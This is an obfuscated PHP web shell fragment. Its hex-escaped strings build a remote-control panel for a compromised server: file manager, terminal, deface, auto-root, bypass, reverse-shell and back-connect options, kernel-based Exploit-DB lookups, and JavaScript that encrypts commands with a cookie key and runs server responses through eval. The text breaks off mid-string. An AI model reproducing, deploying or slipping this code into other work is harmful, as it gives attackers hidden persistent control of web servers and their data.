56\x6d\x61\151\156\x20\164\x68\x7b\164\145\x78\x74\55\x61\154\151\147\156\x3a\x6c\x65\x66\x74\73\x62\141\x63\153\147\162\x6f\x75\x6e\144\x2d\143\x6f\x6c\157\x72\72\x23\60\x36\60\141\x31\x30\x7d\56\155\x61\151\156\40\x74\162\72\x68\157\x76\145\162\173\x62\x61\143\153\x67\x72\x6f\x75\x6e\x64\x2d\143\x6f\x6c\157\162\72\43\63\65\64\62\x35\x32\175\56\x6d\x61\151\156\x20\x74\144\x2c\x74\150\x7b\x76\145\162\x74\151\143\x61\x6c\55\141\x6c\x69\x67\156\x3a\x6d\151\144\144\154\145\x7d\x69\156\x70\x75\164\x5b\164\171\160\x65\75\x73\x75\142\155\151\164\135\173\x62\x61\143\153\x67\162\157\x75\x6e\144\55\x63\x6f\x6c\x6f\162\72\43\x39\x63\71\x38\62\145\175\x69\156\x70\x75\164\x5b\164\x79\160\x65\x3d\142\x75\164\x74\x6f\x6e\135\x7b\x62\141\x63\x6b\147\x72\157\x75\x6e\144\x2d\x63\x6f\154\x6f\162\72\x23\x39\143\x39\70\62\x65\175\x69\x6e\x70\165\164\133\x74\x79\160\x65\75\x73\x75\x62\x6d\x69\164\135\x3a\x68\x6f\166\145\162\x7b\142\x61\143\153\147\162\157\x75\x6e\x64\55\143\157\x6c\x6f\x72\x3a\x23\x66\x66\x64\x62\x35\x66\x7d\x69\x6e\160\165\x74\x5b\164\x79\x70\145\x3d\142\165\x74\x74\x6f\x6e\135\x3a\x68\x6f\x76\x65\x72\x7b\x62\141\143\x6b\147\x72\x6f\165\156\144\x2d\143\x6f\154\x6f\x72\x3a\43\146\x66\144\142\65\x66\175\56\x6c\61\x7b\142\x61\143\x6b\147\162\157\x75\156\144\55\x63\157\154\x6f\x72\72\43\x32\60\x32\x38\63\x32\175\160\x72\145\173\146\x6f\x6e\164\x3a\71\160\164\40\103\157\x75\162\x69\x65\x72\40\x4e\145\x77\175\151\x6e\x70\165\x74\x5b\x74\x79\160\145\x3d\163\165\x62\155\151\x74\x5d\x2e\x63\x75\163\164\157\155\55\x74\157\157\x6c\163\x2d\x62\x75\164\164\157\x6e\x73\173\x66\157\x6e\x74\x2d\x73\x69\x7a\145\x3a\61\64\160\170\x21\151\x6d\160\157\162\x74\141\x6e\x74\x3b\160\x61\x64\144\x69\x6e\147\x3a\x35\160\x78\40\x31\60\160\x78\41\151\x6d\160\x6f\162\164\x61\156\164\x3b\x6d\x61\x72\147\x69\156\x3a\x30\40\x35\160\x78\41\151\155\160\157\162\x74\x61\156\164\73\x66\x6f\x6e\x74\x2d\167\x65\151\x67\x68\164\x3a\67\x30\x30\x21\151\155\x70\157\x72\x74\x61\x6e\164\73\143\x75\162\x73\157\162\72\x70\157\x69\x6e\164\x65\162\x21\151\x6d\x70\157\162\164\141\156\x74\73\143\x6f\154\x6f\x72\72\x23\x65\61\x65\x31\x65\x31\x21\x69\155\x70\157\x72\x74\141\156\164\x3b\142\141\143\x6b\x67\x72\x6f\165\156\144\55\x63\x6f\154\157\162\x3a\43\x30\x36\x30\141\x31\60\41\151\x6d\160\x6f\x72\164\x61\156\164\x3b\142\x6f\162\x64\145\x72\x3a\x31\x70\x78\x20\163\x6f\154\151\144\x20\x23\x39\x63\x39\x38\x32\145\x21\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x7d\151\156\160\165\x74\133\x74\x79\x70\x65\x3d\163\x75\142\x6d\151\164\x5d\x2e\x63\x75\163\x74\157\155\x2d\164\x6f\x6f\x6c\163\55\142\165\x74\x74\157\156\x73\72\x68\157\166\145\x72\x7b\x62\141\x63\x6b\x67\x72\x6f\165\156\144\55\143\x6f\x6c\157\x72\x3a\x23\71\x63\71\70\x32\145\x21\151\155\160\x6f\162\x74\141\156\x74\x7d\74\x2f\163\x74\x79\x6c\x65\x3e\12\x3c\163\143\x72\151\x70\164\76\12\166\x61\162\40\x63\x5f\40\75\40\47".htmlspecialchars($GLOBALS["\143\x77\x64"])."\x27\x3b\12\x76\x61\162\x20\141\x5f\40\75\x20\47".htmlspecialchars(@$_POST["\x61"])."\x27\12\x76\141\x72\40\143\150\141\x72\163\145\x74\x5f\40\75\40\x27".htmlspecialchars(@$_POST["\143\150\x61\162\x73\145\164"])."\x27\x3b\xa\x76\141\x72\40\160\61\x5f\40\x3d\x20\47".(strpos(@$_POST["\160\x31"],"\12")!==false?'':htmlspecialchars($_POST["\160\61"],ENT_QUOTES))."\47\x3b\xa\166\141\162\x20\160\62\137\40\75\x20\x27".(strpos(@$_POST["\x70\62"],"\12")!==false?'':htmlspecialchars($_POST["\160\x32"],ENT_QUOTES))."\x27\73\xa\x76\141\x72\40\160\63\137\40\x3d\x20\x27".(strpos(@$_POST["\x70\63"],"\xa")!==false?'':htmlspecialchars($_POST["\x70\x33"],ENT_QUOTES))."\x27\x3b\xa\x76\x61\x72\40\144\40\x3d\x20\144\x6f\143\x75\155\145\156\x74\73\12\146\x75\156\143\x74\x69\157\156\40\x65\156\x63\162\x79\160\x74\x28\x73\164\162\54\160\167\x64\51\173\x69\146\50\x70\x77\x64\75\75\x6e\x75\154\x6c\x7c\174\160\167\x64\x2e\x6c\145\x6e\x67\164\150\74\x3d\60\x29\173\x72\145\164\165\162\x6e\x20\156\x75\x6c\x6c\x3b\175\163\164\x72\75\142\141\163\x65\66\64\137\145\x6e\x63\x6f\144\x65\x28\x73\x74\x72\51\73\x70\x77\144\75\x62\141\x73\x65\66\64\x5f\x65\156\x63\x6f\x64\145\50\x70\x77\144\x29\73\166\141\x72\x20\x65\156\x63\x5f\x63\x68\x72\x3d\x27\x27\73\x76\x61\162\x20\145\156\143\137\163\x74\162\x3d\x27\x27\73\x76\x61\162\x20\151\75\60\x3b\167\150\x69\154\x65\x28\151\x3c\x73\x74\x72\56\154\x65\156\x67\164\x68\x29\173\146\157\x72\50\166\141\x72\40\x6a\75\60\73\x6a\74\x70\167\144\x2e\154\145\x6e\x67\x74\150\x3b\152\x2b\x2b\51\x7b\145\156\x63\137\x63\150\162\x3d\163\164\162\x2e\143\x68\141\162\x43\x6f\x64\145\x41\x74\50\x69\51\x5e\160\167\x64\56\143\x68\x61\x72\103\157\144\145\x41\164\x28\x6a\51\73\x65\156\x63\x5f\x73\x74\162\53\x3d\x53\164\162\x69\x6e\147\x2e\x66\162\157\155\x43\x68\141\x72\103\x6f\x64\145\50\145\156\x63\x5f\143\150\x72\51\x3b\151\53\x2b\73\151\x66\x28\x69\76\75\x73\164\162\56\154\x65\156\147\x74\x68\x29\142\162\145\141\153\73\175\175\162\145\x74\165\x72\156\x20\142\141\x73\145\x36\64\137\145\x6e\x63\157\x64\145\x28\x65\156\x63\x5f\163\x74\x72\x29\x3b\x7d\12\x66\x75\x6e\x63\164\151\157\x6e\x20\x75\164\x66\70\137\x65\x6e\143\x6f\x64\145\50\141\x72\147\123\164\162\151\156\147\x29\x7b\x76\141\162\x20\163\164\162\151\x6e\147\75\x28\141\x72\147\123\164\x72\151\x6e\x67\x2b\47\x27\51\x3b\166\141\x72\x20\165\x74\146\164\145\x78\x74\x3d\47\47\54\163\x74\141\162\x74\x2c\145\x6e\144\x2c\x73\x74\x72\x69\156\147\x6c\x3d\x30\x3b\x73\x74\x61\x72\x74\75\x65\x6e\144\x3d\x30\73\163\x74\x72\x69\156\x67\x6c\75\x73\164\x72\151\156\x67\x2e\x6c\x65\156\x67\164\150\73\x66\157\162\x28\x76\141\x72\x20\156\x3d\x30\73\156\x3c\163\164\162\151\x6e\147\x6c\x3b\x6e\x2b\x2b\51\x7b\x76\x61\162\40\x63\61\x3d\x73\164\162\151\x6e\147\x2e\143\x68\x61\x72\x43\x6f\x64\x65\101\x74\50\156\51\x3b\166\x61\162\40\x65\156\143\x3d\156\x75\154\154\x3b\x69\146\50\143\x31\x3c\x31\x32\x38\x29\x7b\x65\x6e\x64\x2b\x2b\73\x7d\x65\154\x73\145\40\x69\146\x28\143\61\x3e\x31\x32\67\x26\46\x63\x31\74\62\x30\64\70\51\x7b\x65\156\x63\75\123\x74\162\x69\156\x67\56\x66\162\157\155\x43\150\x61\x72\x43\157\x64\145\50\x28\143\61\76\x3e\x36\x29\174\61\71\x32\x29\x2b\123\x74\162\151\x6e\x67\x2e\x66\x72\157\x6d\103\x68\141\x72\x43\157\x64\x65\x28\x28\143\x31\x26\66\x33\51\174\x31\62\x38\x29\73\175\145\154\x73\x65\173\x65\x6e\x63\x3d\x53\164\162\x69\x6e\x67\x2e\146\162\x6f\155\x43\150\141\x72\103\157\x64\145\x28\50\x63\61\76\x3e\x31\x32\51\x7c\x32\x32\x34\x29\53\x53\164\162\x69\x6e\147\x2e\x66\162\x6f\x6d\x43\150\x61\162\x43\x6f\144\x65\50\x28\50\x63\61\x3e\76\66\51\46\x36\63\x29\x7c\x31\x32\x38\51\x2b\x53\164\162\151\156\147\56\146\x72\x6f\155\x43\150\x61\162\103\x6f\x64\145\x28\50\x63\x31\46\x36\x33\51\174\61\x32\70\x29\73\x7d\151\146\50\x65\156\143\41\x3d\x3d\x6e\165\154\154\x29\x7b\x69\x66\x28\145\x6e\144\76\x73\x74\141\162\x74\x29\173\x75\164\146\x74\x65\x78\164\53\x3d\163\x74\x72\151\x6e\x67\56\163\154\x69\x63\145\x28\163\164\141\x72\x74\x2c\x65\156\144\x29\73\175\x75\164\x66\164\145\170\x74\x2b\x3d\145\156\143\x3b\x73\x74\141\x72\x74\75\145\156\x64\x3d\x6e\x2b\61\x3b\175\175\x69\x66\50\145\x6e\144\x3e\x73\164\x61\x72\x74\x29\173\165\164\146\164\145\170\x74\x2b\75\x73\164\162\151\156\x67\x2e\x73\x6c\x69\143\145\x28\x73\x74\141\162\164\x2c\163\x74\x72\x69\x6e\x67\154\51\x3b\175\162\145\x74\x75\162\156\x20\x75\164\146\164\x65\x78\x74\x3b\x7d\12\x66\165\x6e\143\164\151\x6f\x6e\x20\x62\141\163\145\x36\64\137\x65\156\x63\157\x64\x65\50\144\x61\x74\141\51\x7b\166\141\x72\x20\142\66\x34\40\x3d\40\x27\x41\x42\103\x44\x45\106\107\x48\x49\x4a\x4b\114\115\x4e\x4f\120\x51\122\123\124\125\x56\127\130\x59\132\141\x62\x63\x64\145\146\147\x68\151\x6a\153\154\x6d\x6e\157\x70\161\162\x73\x74\x75\166\167\170\x79\x7a\60\61\x32\x33\x34\x35\66\x37\x38\x39\x2b\57\75\x27\73\166\x61\x72\40\157\x31\54\157\x32\54\157\63\54\150\x31\x2c\150\62\x2c\150\x33\54\150\x34\x2c\142\x69\x74\163\54\151\x3d\x30\x2c\141\x63\75\60\x2c\145\x6e\143\75\x27\47\54\164\x6d\160\137\x61\x72\x72\75\133\135\x3b\x69\146\40\x28\x21\x64\141\164\x61\51\x7b\162\145\x74\165\162\156\40\144\141\x74\141\x3b\x7d\144\x61\164\x61\75\165\164\146\70\137\x65\x6e\x63\x6f\x64\145\50\x64\x61\x74\x61\x2b\x27\x27\51\x3b\x64\x6f\173\157\61\x3d\x64\141\x74\141\56\x63\150\x61\x72\103\x6f\x64\145\101\164\50\151\53\53\x29\73\157\x32\x3d\x64\141\x74\141\56\x63\x68\141\x72\103\157\x64\145\x41\x74\x28\151\x2b\53\51\73\x6f\x33\75\x64\x61\164\x61\56\x63\x68\141\162\103\x6f\x64\x65\x41\x74\50\x69\53\53\51\x3b\142\151\x74\x73\75\x6f\x31\74\x3c\x31\x36\174\157\62\x3c\x3c\70\174\157\x33\73\150\x31\x3d\142\151\x74\163\x3e\76\61\70\x26\x30\x78\63\146\x3b\150\62\x3d\x62\151\164\x73\x3e\76\x31\x32\46\x30\170\63\x66\x3b\x68\63\75\x62\151\164\163\x3e\x3e\x36\x26\x30\x78\63\146\73\x68\64\75\142\x69\164\163\46\x30\x78\63\x66\73\164\x6d\160\x5f\141\162\x72\x5b\141\x63\x2b\x2b\135\x3d\142\x36\x34\x2e\143\x68\x61\x72\x41\x74\50\150\61\x29\53\x62\x36\64\x2e\143\x68\141\162\x41\x74\50\150\x32\x29\x2b\142\66\64\56\x63\x68\141\162\101\164\50\x68\63\x29\x2b\142\66\64\56\143\x68\141\162\101\x74\50\x68\64\x29\x3b\x7d\x77\150\x69\x6c\x65\x28\151\x3c\144\141\164\141\x2e\154\x65\x6e\147\x74\150\51\73\x65\156\143\75\164\155\160\x5f\141\162\x72\x2e\x6a\157\x69\x6e\x28\47\x27\51\73\x73\x77\x69\164\143\150\x20\x28\x64\141\x74\141\x2e\x6c\x65\x6e\147\164\150\x25\x33\51\173\x63\141\163\x65\40\61\x3a\x65\156\x63\x3d\x65\156\x63\56\x73\154\151\143\145\50\60\54\x2d\x32\51\x2b\47\x3d\x3d\x27\x3b\x62\162\145\141\x6b\x3b\x63\x61\x73\x65\40\x32\x3a\145\156\x63\x3d\x65\x6e\x63\x2e\163\x6c\151\x63\x65\x28\60\54\55\x31\x29\x2b\x27\75\x27\x3b\142\162\145\x61\x6b\73\x7d\x72\x65\x74\x75\162\156\40\145\x6e\x63\x3b\175\xa\x66\165\156\143\164\151\157\156\x20\163\145\x74\x28\141\x2c\x63\x2c\160\x31\x2c\160\x32\x2c\160\x33\x2c\143\150\x61\x72\163\145\x74\x29\40\173\xa\151\146\x28\x61\x21\x3d\156\x75\x6c\x6c\x29\x64\x2e\155\x66\56\x61\x2e\166\141\154\x75\145\75\141\73\x65\x6c\x73\x65\x20\144\x2e\x6d\146\56\x61\x2e\x76\x61\154\165\145\x3d\x61\137\x3b\12\x69\146\50\x63\x21\75\156\165\x6c\154\51\x64\56\155\146\x2e\143\56\166\x61\x6c\165\145\75\x63\x3b\x65\154\163\x65\40\144\x2e\155\x66\56\x63\x2e\x76\x61\x6c\x75\x65\75\143\137\73\xa\151\x66\50\160\x31\x21\x3d\x6e\x75\x6c\154\x29\144\56\x6d\x66\56\160\61\56\166\141\154\x75\145\75\x70\61\x3b\x65\x6c\x73\x65\40\x64\x2e\155\x66\x2e\160\x31\56\166\141\x6c\x75\x65\x3d\x70\61\x5f\73\xa\151\x66\50\x70\x32\x21\x3d\x6e\x75\x6c\154\51\144\x2e\155\146\x2e\160\x32\56\x76\x61\x6c\165\x65\x3d\x70\x32\73\145\154\x73\x65\40\144\56\155\x66\56\160\62\56\166\x61\154\x75\145\x3d\x70\x32\x5f\x3b\xa\151\146\50\160\63\41\x3d\x6e\x75\x6c\154\51\x64\56\x6d\x66\56\160\x33\56\166\x61\x6c\x75\145\x3d\160\63\73\x65\154\x73\x65\x20\144\56\x6d\146\x2e\x70\x33\56\x76\x61\154\x75\x65\75\160\63\137\x3b\12\144\x2e\x6d\146\56\141\x2e\x76\141\x6c\165\x65\40\75\40\145\156\143\162\x79\x70\x74\x28\x64\x2e\155\146\56\x61\56\166\x61\154\x75\145\54\x27".$_COOKIE[sha1(md5($_SERVER["\x48\124\x54\x50\137\110\117\x53\x54"]))."\170"]."\x27\x29\73\12\144\x2e\x6d\x66\56\x63\x2e\166\x61\154\x75\145\40\75\40\x65\156\143\x72\171\x70\164\x28\x64\56\155\x66\56\143\56\x76\x61\154\165\x65\54\x27".$_COOKIE[sha1(md5($_SERVER["\x48\124\124\x50\x5f\110\117\123\x54"]))."\170"]."\x27\x29\x3b\12\x64\56\x6d\146\56\x70\x31\56\x76\141\154\x75\x65\40\75\x20\145\156\x63\162\x79\160\x74\50\144\56\155\146\56\x70\x31\x2e\x76\x61\x6c\165\x65\54\x27".$_COOKIE[sha1(md5($_SERVER["\x48\124\124\120\137\x48\117\123\124"]))."\170"]."\47\x29\73\12\144\56\155\146\x2e\160\x32\56\x76\x61\154\x75\145\x20\x3d\x20\145\x6e\143\162\x79\x70\x74\50\x64\56\x6d\x66\x2e\x70\x32\x2e\166\x61\x6c\x75\x65\54\47".$_COOKIE[sha1(md5($_SERVER["\110\124\124\120\x5f\x48\117\123\x54"]))."\170"]."\x27\x29\x3b\12\144\x2e\x6d\x66\x2e\x70\63\56\x76\x61\x6c\165\x65\40\75\40\x65\x6e\x63\162\x79\x70\x74\50\144\x2e\x6d\x66\56\x70\63\x2e\166\141\154\x75\x65\54\47".$_COOKIE[sha1(md5($_SERVER["\x48\x54\x54\x50\137\x48\x4f\x53\x54"]))."\x78"]."\x27\51\x3b\xa\151\146\x28\143\x68\x61\162\x73\x65\x74\41\75\x6e\165\x6c\x6c\x29\144\56\155\x66\x2e\x63\x68\x61\x72\163\x65\164\56\166\141\x6c\165\145\75\x63\150\141\162\163\x65\164\x3b\145\154\x73\145\x20\144\x2e\x6d\146\56\x63\150\x61\x72\163\145\164\x2e\166\141\154\165\145\x3d\143\x68\x61\162\x73\x65\x74\x5f\73\12\175\xa\x66\165\156\143\164\151\157\x6e\x20\147\50\x61\x2c\143\54\x70\61\54\x70\62\x2c\x70\x33\54\x63\150\141\162\163\x65\x74\51\40\173\xa\163\x65\x74\50\x61\x2c\143\x2c\160\x31\x2c\160\x32\54\160\63\x2c\x63\x68\x61\162\163\145\x74\x29\x3b\xa\x64\56\155\146\x2e\x73\x75\142\155\151\164\50\x29\x3b\xa\x7d\12\x66\165\156\x63\164\151\x6f\156\x20\141\x28\141\54\143\54\x70\x31\54\x70\62\x2c\x70\63\54\143\x68\141\162\x73\x65\x74\x29\x20\173\12\163\145\x74\x28\x61\54\x63\x2c\x70\x31\x2c\160\62\x2c\160\63\x2c\143\x68\x61\x72\x73\x65\x74\x29\73\xa\166\x61\162\x20\160\141\162\141\x6d\x73\x20\x3d\x20\x27\141\152\141\170\75\164\162\165\x65\x27\x3b\xa\146\157\x72\50\x69\x3d\x30\73\x69\x3c\144\56\x6d\146\56\x65\x6c\x65\155\x65\156\164\x73\56\x6c\x65\x6e\147\164\150\73\x69\53\53\x29\12\160\x61\162\x61\x6d\163\x20\x2b\75\x20\47\46\x27\53\144\56\x6d\x66\x2e\x65\154\x65\x6d\145\156\x74\163\x5b\x69\135\56\156\141\x6d\x65\x2b\x27\75\x27\x2b\145\x6e\x63\157\x64\145\x55\x52\x49\x43\x6f\x6d\x70\x6f\x6e\x65\156\x74\50\144\x2e\x6d\146\56\145\x6c\145\x6d\x65\x6e\x74\x73\x5b\x69\135\56\x76\x61\154\165\145\x29\x3b\xa\x73\x72\x28\x27".addslashes($_SERVER["\x52\x45\x51\x55\105\123\x54\x5f\125\x52\111"])."\x27\x2c\40\x70\x61\x72\x61\155\163\x29\73\12\175\12\146\x75\156\143\164\x69\x6f\156\40\x73\162\x28\x75\162\x6c\x2c\40\x70\141\x72\141\155\x73\x29\40\x7b\12\151\146\40\50\167\x69\156\144\157\167\56\x58\x4d\x4c\110\x74\164\160\122\x65\x71\x75\145\x73\164\x29\12\162\145\x71\40\x3d\x20\156\145\167\x20\x58\115\x4c\110\x74\x74\160\122\x65\x71\x75\x65\163\164\50\51\x3b\xa\x65\154\x73\145\x20\151\x66\40\x28\167\x69\156\144\157\x77\56\x41\143\164\151\x76\145\x58\x4f\142\152\x65\143\x74\51\xa\162\x65\161\40\75\x20\x6e\x65\167\x20\101\x63\x74\151\x76\145\x58\117\142\152\x65\143\x74\50\47\x4d\151\x63\x72\157\x73\x6f\146\164\56\130\115\114\110\x54\124\120\47\x29\73\12\x69\146\x20\x28\162\145\161\x29\40\173\xa\x72\x65\161\56\x6f\x6e\x72\145\141\144\171\x73\x74\141\x74\x65\143\x68\141\156\147\145\x20\x3d\x20\160\162\x6f\143\145\x73\x73\122\x65\x71\103\150\141\156\147\145\73\12\x72\x65\x71\56\x6f\160\x65\156\50\x27\120\117\123\x54\47\x2c\x20\165\162\x6c\x2c\40\x74\x72\x75\145\x29\73\12\x72\x65\x71\x2e\x73\145\x74\x52\145\x71\x75\145\x73\x74\110\x65\x61\144\145\x72\x20\50\x27\103\x6f\156\164\145\x6e\x74\55\124\x79\x70\x65\47\x2c\40\x27\x61\160\160\x6c\x69\143\x61\x74\x69\157\156\x2f\x78\x2d\x77\167\x77\55\146\157\162\x6d\x2d\x75\x72\154\145\x6e\x63\x6f\144\x65\x64\x27\x29\x3b\12\162\x65\161\x2e\x73\145\156\x64\50\x70\141\162\x61\x6d\163\x29\73\xa\175\12\175\xa\x66\x75\156\x63\164\x69\157\x6e\x20\160\x72\157\143\145\163\163\x52\x65\161\103\150\x61\x6e\147\x65\50\51\40\173\xa\x69\146\50\40\x28\x72\145\x71\56\162\x65\141\x64\171\123\x74\x61\x74\145\x20\75\75\x20\64\x29\x20\51\12\151\146\50\162\145\161\x2e\x73\x74\141\164\165\x73\40\x3d\x3d\40\62\x30\60\51\40\x7b\xa\x76\x61\162\40\x72\145\x67\40\75\40\156\x65\167\x20\122\145\147\105\170\x70\50\42\50\134\134\144\53\x29\50\x5b\134\x5c\x53\x5c\x5c\x73\x5d\52\x29\42\x2c\x20\x27\x6d\47\51\x3b\xa\x76\141\162\x20\141\x72\x72\75\162\145\x67\56\145\x78\145\143\50\x72\x65\161\x2e\x72\x65\x73\160\x6f\156\x73\145\x54\x65\170\164\x29\73\12\145\x76\x61\x6c\50\x61\162\162\x5b\62\x5d\56\163\165\x62\163\x74\x72\x28\x30\54\x20\141\162\x72\133\61\x5d\51\51\73\12\x7d\40\x65\154\x73\145\40\x61\x6c\x65\x72\164\50\x27\x52\145\161\165\x65\163\x74\x20\145\x72\x72\x6f\x72\x21\x27\x29\73\12\175\xa\x3c\57\x73\x63\162\x69\x70\164\76\xa\74\150\145\141\144\76\x3c\142\157\144\x79\76\x3c\144\151\166\40\x73\164\171\x6c\x65\x3d\x27\x70\157\163\151\x74\151\x6f\x6e\72\x61\142\x73\157\154\165\164\145\x3b\142\141\x63\x6b\x67\x72\157\x75\x6e\144\55\143\157\154\157\x72\72\x72\147\x62\x61\50\x39\x35\54\40\61\61\60\x2c\x20\x31\x33\x30\54\x20\x30\x2e\x33\51\x3b\167\151\144\164\x68\72\61\x30\x30\45\73\164\157\160\x3a\60\x3b\154\x65\146\x74\x3a\60\73\x27\x3e\12\x3c\146\x6f\162\155\x20\155\x65\x74\x68\x6f\x64\x3d\x70\x6f\163\164\40\x6e\141\155\145\75\155\x66\40\x73\x74\171\x6c\145\x3d\x27\x64\x69\x73\x70\x6c\x61\171\72\156\x6f\x6e\x65\73\47\x3e\12\x3c\151\x6e\x70\x75\x74\40\164\x79\x70\145\x3d\x68\151\144\144\145\156\40\x6e\141\x6d\x65\x3d\141\76\xa\74\151\x6e\x70\x75\164\x20\x74\171\x70\145\75\x68\151\x64\144\145\x6e\x20\156\141\x6d\145\x3d\143\76\xa\74\151\156\160\165\x74\40\x74\x79\160\145\75\x68\151\x64\144\x65\x6e\40\156\141\155\145\75\160\61\76\12\x3c\x69\x6e\x70\165\x74\40\x74\171\x70\x65\x3d\x68\x69\144\x64\x65\x6e\40\x6e\x61\x6d\x65\75\160\x32\x3e\xa\x3c\x69\156\160\x75\x74\40\164\x79\x70\x65\75\x68\x69\144\144\x65\x6e\x20\x6e\x61\155\x65\x3d\160\x33\x3e\12\x3c\151\156\160\x75\164\x20\164\x79\x70\x65\75\x68\151\x64\144\145\x6e\40\156\x61\155\x65\x3d\143\x68\141\162\163\x65\x74\x3e\xa\74\57\146\157\162\155\x3e";$freeSpace=@diskfreespace($GLOBALS["\143\167\x64"]);$totalSpace=@disk_total_space($GLOBALS["\143\x77\144"]);$totalSpace=$totalSpace?$totalSpace:1;$release=@php_uname("\162");$kernel=@php_uname("\163");$explink="\x68\x74\x74\160\72\x2f\x2f\x77\167\x77\56\154\157\154\x69\x6e\145\x7a\56\143\157\155\x2f\77\150\164\x74\160\x73\x3a\57\57\167\167\x77\x2e\145\x78\x70\154\157\x69\164\x2d\x64\x62\56\143\x6f\155\57\x73\145\141\162\x63\x68\x3f\x71\x3d";if(strpos("\x4c\x69\156\x75\170",$kernel)!==false){$explink.=urlencode("\x4c\151\x6e\x75\170\x20\113\x65\162\156\x65\x6c\40".substr($release,0,6));}else{$explink.=urlencode($kernel."\40".substr($release,0,3));}if(!function_exists("\160\x6f\x73\151\x78\137\x67\145\x74\145\x67\151\144")){$user=@get_current_user();$uid=@getmyuid();$gid=@getmygid();$group="\77";}else{$uid=@posix_getpwuid(@posix_geteuid());$gid=@posix_getgrgid(@posix_getegid());$user=$uid["\156\141\x6d\145"];$uid=$uid["\x75\151\144"];$group=$gid["\x6e\141\x6d\x65"];$gid=$gid["\x67\x69\x64"];}$cwd_links='';$path=explode("\x2f",$GLOBALS["\x63\x77\x64"]);$n=count($path);for($i=0;$i<$n-1;$i++){$cwd_links.="\x3c\141\x20\x68\x72\x65\x66\x3d\47\43\47\40\157\x6e\143\154\x69\143\153\75\47\147\50\x22\106\151\154\145\163\x4d\141\156\x22\54\42";for($j=0;$j<=$i;$j++){$cwd_links.=$path[$j]."\x2f";}$cwd_links.="\42\51\47\76".$path[$i]."\x2f\74\x2f\x61\76";}$charsets=array("\x57\x69\x6e\x64\x6f\167\163\x2d\x31\62\65\61","\125\x54\x46\x2d\70","\x4b\117\x49\x38\55\x52","\113\117\111\x38\x2d\125","\143\x70\x38\66\x36");$opt_charsets='';foreach($charsets as $asciifnc6){$opt_charsets.="\74\157\160\x74\x69\x6f\x6e\40\166\x61\x6c\165\145\x3d\x22".$asciifnc6."\42\x20".($_POST["\x63\x68\x61\162\x73\x65\164"]==$asciifnc6?"\163\145\154\145\x63\x74\145\144":'')."\x3e".$asciifnc6."\x3c\x2f\x6f\160\x74\x69\x6f\156\x3e";}$m=array("\111\x6e\146\157"=>"\123\x65\x63\111\156\x66\x6f","\106\x69\x6c\x65\163"=>"\x46\x69\154\145\163\x4d\x61\x6e","\101\x64\x6d\151\156\145\162"=>"\101\144\155\151\156\x65\x72","\x44\x65\x66\141\x63\x65"=>"\x44\x65\146\141\143\145","\x54\x65\162\x6d\151\156\141\154"=>"\x43\x6f\x6e\163\157\x6c\x65","\125\163\145\x72"=>"\x45\144\x69\x74\165\x73\x65\162","\x43\160\141\x6e\145\154"=>"\103\x70\141\x6e\145\x6c","\122\x6f\x6f\x74"=>"\101\165\164\157\x52\x6f\157\164","\x4a\165\155\x70\x69\x6e\x67"=>"\x53\x74\x72\151\x6e\x67\124\157\157\154\163","\102\171\x70\x61\x73\163"=>"\x62\x79\160\141\163","\122\x65\166\145\162\163\145"=>"\x72\145\166\145\162\x73\145\x70\150\x70","\x42\103"=>"\x4e\145\164\x77\157\x72\x6b");if(!empty($GLOBALS["\141\165\164\x68\137\x70\x61\163\163\65"])){$m["\x4c\157\147\157\x75\164"]="\114\157\147\x6f\165\x74";}$m["\113\151\154\154"]="\x53\145\154\146\122\x65\x6d\157\x76\x65";$menu='';foreach($m as $k=>$v){$menu.="\x3c\x74\150\76\x20\x3c\146\157\156\164\x20\143\157\154\x6f\162\75\x22\43\146\146\x66\42\x3e\x2d\40\74\x61\40\150\162\145\146\x3d\42\x23\x22\x20\157\x6e\143\154\151\143\x6b\75\42\147\50\47".$v."\47\54\156\165\154\154\54\x27\47\x2c\47\47\x2c\x27\x27\x29\42\76".$k."\74\57\141\x3e\74\x2f\x66\x6f\x6e\x74\x3e\x3c\x2f\x74\150\76";}$drives='';if($GLOBALS["\157\163"]=="\x77\151\x6e"){foreach(range("\143","\x7a")as $drive){if(is_dir($drive."\72\x5c")){$drives.="\x3c\141\40\150\162\x65\x66\75\42\x23\x22\40\x6f\x6e\x63\x6c\x69\x63\153\75\x22\x67\x28\47\106\151\154\x65\163\x4d\141\156\x27\54\47".$drive."\72\57\47\51\42\x3e\133\x20".$drive."\40\x5d\x3c\57\x61\x3e\x20";}}}echo "\x3c\164\141\142\x6c\145\40\x63\154\x61\163\x73\75\x69\156\146\x6f\x6f\40\143\145\x6c\154\160\141\144\144\x69\x6e\x67\75\x33\40\x63\145\x6c\x6c\163\160\x61\143\151\x6e\x67\75\x30\x20\167\x69\144\164\150\x3d\x31\x30\60\x25\76\74\164\162\76\x3c\x74\x64\x20\x77\151\x64\164\150\x3d\61\x3e\x3c\x73\x70\x61\x6e\x3e\125\156\x61\155\x65\72\x3c\x62\x72\x3e\125\163\x65\x72\x3a\74\x62\x72\x3e\x50\150\160\x3a\74\x62\x72\76\110\x64\144\72\74\x62\162\76\x43\167\144\72".($GLOBALS["\x6f\x73"]=="\167\151\156"?"\x3c\x62\x72\x3e\104\162\x69\x76\145\x73\x3a":'')."\x3c\x2f\x73\160\141\156\x3e\74\57\164\x64\76"."\74\164\144\76\74\x6e\x6f\x62\x72\x3e".substr(@php_uname(),0,120)."\x20\74\x61\40\150\x72\145\x66\75\42\150\164\164\160\x3a\x2f\x2f\x77\167\x77\x2e\x6c\157\154\x69\156\x65\172\x2e\x63\x6f\x6d\57\77\x68\164\164\x70\x73\72\x2f\x2f\x77\x77\167\56\x67\x6f\x6f\147\154\145\x2e\x63\x6f\155\57\163\x65\x61\x72\x63\x68\77\x71\x3d".urlencode(@php_uname())."\x22\x20\x74\141\162\x67\x65\164\75\x22\x5f\142\x6c\141\x6e\153\x22\x20\162\x65\x6c\x3d\x22\156\x6f\146\x6f\154\x6c\157\x77\x20\x6e\x6f\x72\x65\146\x65\x72\x72\x65\x72\40\x6e\157\157\160\x65\156\145\x72\42\x3e\133\x20\x47\157\x6f\147\154\145\40\x5d\74\57\141\x3e\x20\x3c\141\x20\150\x72\x65\146\75\x22".$explink."\x22\40\x74\x61\x72\147\145\164\x3d\x5f\x62\x6c\141\x6e\153\40\x72\x65\x6c\x3d\156\x6f\146\157\x6c\x6c\157\x77\40\x6e\157\162\x65\146\145\162\162\x65\x72\x20\156\x6f\157\x70\145\x6e\145\162\x3e\133\x20\105\170\160\x6c\157\x69\x74\x2d\104\102\x20\x5d\74\x2f\141\x3e\74\57\x6e\x6f\142\162\x3e\74\x62\162\x3e".$uid."\40\50\40".$user."\40\x29\x20\x3c\163\160\x61\x6e\x